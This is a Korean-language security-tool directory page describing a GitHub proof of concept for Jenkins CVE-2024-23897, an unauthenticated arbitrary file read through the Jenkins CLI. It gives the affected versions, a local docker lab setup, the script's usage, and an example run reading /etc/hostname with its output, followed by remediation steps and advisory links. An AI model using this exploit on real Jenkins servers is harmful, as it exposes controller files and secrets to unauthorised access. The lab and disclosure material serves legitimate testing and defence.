Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Jenkins-CVE-2024-23897 — Jenkins CVE-2024-23897용 PoC | Kitploit
도구/GitHubGitHub/abraxa5/jenkins-cve-2024-23897
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingRed Teaming
GitHubabraxa5/jenkins-cve-2024-23897

Jenkins-CVE-2024-23897

Jenkins CVE-2024-23897용 PoC

저장소 보기
112년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

Jenkins CVE-2024-23897 PoC

CVE-2024-23897에 대한 개념 증명(PoC)으로, Jenkins의 내장 명령줄 인터페이스(CLI)의 임의 파일 읽기 취약점입니다. 인증되지 않은 공격자가 Overall/Read 권한을 가지고 Jenkins 컨트롤러 파일 시스템에서 임의 파일을 읽을 수 있습니다.

영향받는 버전

  • Jenkins 버전 <= 2.441
  • Jenkins LTS 버전 <= 2.426.2

취약한 인스턴스 설정

docker compose를 사용하여 로컬 취약한 인스턴스를 실행합니다:

root@kitploit:~
cd docker
docker compose up -d

인스턴스는 http://localhost:1234에서 접근 가능합니다.

익스플로잇

root@kitploit:~
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)

예제

root@kitploit:~
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

이 스크립트는 동시성 및 연결 시간 초과로 인해 큰 파일을 읽는 데 문제가 있을 수 있습니다. 취약점에 대한 자세한 기술 정보와 설명은 제 블로그 게시물을 참조하세요.

수정

  • Jenkins 2.442 또는 LTS 2.426.3으로 업그레이드
  • Jenkins 보안 권고에 설명된 임시 해결 방법을 적용합니다.

관련 링크

  • Sonar Source | 과도한 확장: Jenkins의 중요한 보안 취약점 발견
  • Jenkins 보안 권고 - 2024-01-24
  • Qualys ThreatPROTECT | Jenkins 핵심 원격 코드 실행 취약점 (CVE-2024-23897)
  • CVE-2024-23897: Jenkins 임의 파일 유출 취약점의 영향 평가 – Horizon3.ai
도구 다운로드